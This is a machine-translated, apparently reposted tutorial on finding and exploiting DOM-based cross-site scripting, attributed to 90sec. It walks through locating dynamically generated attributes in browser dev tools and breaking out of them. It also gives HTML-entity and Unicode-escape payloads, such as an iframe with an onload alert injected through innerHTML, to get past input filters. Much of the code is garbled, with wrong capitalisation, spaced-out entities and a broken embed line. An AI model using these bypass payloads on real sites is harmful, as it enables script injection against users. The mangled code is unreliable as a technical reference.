About DOM xss cross-site experience

Comments: The harm caused by Xss. we all realized that csrf, Trojan, cookies, ajax, xssshell, and various exploitation methods starting with Xss .... the harm caused by Xss has been noticed by mavericks that csrf, Trojan, cookies, ajax, and xssshell are also exploited ....
Most of the information we usually find stays on direct input and output, which is usually easy to filter.
DOM xss is the role type.
Is it directly output,
 

In other words, the output content cannot be seen in the source code.
For example, you can right click here and view the source code directly. This is the result of direct input and output.
This is the direct output type.
Basic Methods for searching dom xss:
This is generally the case. First, a normal content is provided,
Then F12 open the debugging tool (Firefox Firebug plug-in );
Locate the content you sent, and there is an arrow in the debugging tool to select the location specified on the webpage.
Then, check whether there are any hidden or custom attributes in the content you sent.
Generally, <a href = "xxx" title = "your input"> xxxxxxx </a>
Besides, if you enter a sentence, you cannot directly view the source code.
In other words, <a href = "xxx" title = "your input sentence"> xxxxxxx </a> is dynamically generated.
At this time, there are potential problems. If "Your entered sentence" is written as xxxxxxxxx "> <"
<A href = "xxx" title = "xxxxxxxxx"> <""> xxxxxxx </a>
An HTML Tag will be inserted.
But in actual situations, ",> are all filtered (here, black friends will say they have escaped the filter, and there is no breakthrough-_-I used to do the same)
The sentence you entered is
Xxxxxxxxx & quot; & gt; & lt; img & gt; & lt; & quot;
Because it is the final result of dynamic generation, & quot; will automatically become "It's strange to everyone. Let's explain it.
& Gt; --->
<----> <So the final result is <a href = "xxx" title = "xxxxxxxxx"> <""> xxxxxxx </a> (and many programmers, no filter &)
Next we will test it locally.

The Code is as follows:
<Div id = "m"> x </div>
<Script>
Var x = "content ";
Document. getElementById ("m"). innerHTML = x;
</Script>

The content is the content we enter, for example, <script> <iframe> various labels =. If these escape characters such as <'"> are filtered by the input on a general website, it is very difficult for us to break through.
Test

The Code is as follows:
<Script>
Function test (n ){
Alert (n );}
</Script> www.jb51.net
</img>
</img> & # x27

Write an encoding column for everyone.

The Code is as follows:
<Div id = "y"> </div>
<embed src = & quot; dependencies> <#. mp3 "> </p> <script>
Document. getElementById ("y"). innerHTML = document. getElementById ("x"). alt;
</Script> xxx. innerHTML = yyy.

A certain Attribute-successful code bypass ("= & quot = & #39;) encoding is not a problem I developed. Don't ask me -_-~!
We can also test it like this.

The Code is as follows:
<Div id = "m"> x </div>
<Script>
Var x = "\ u003ciframe onload = alert (1) \ u003e ";
Document. getElementById ("m"). innerHTML = x;
</Script>

Unicode Character List: http://zh.wikipedia.org/wiki/Unicode%E5%AD%97%E7%AC%A6%E5%88%97%E8%A1%A8
Xss Security Test character conversion tool: http://app.baidu.com/app/enter? Appid = 1, 280383
Author 90sec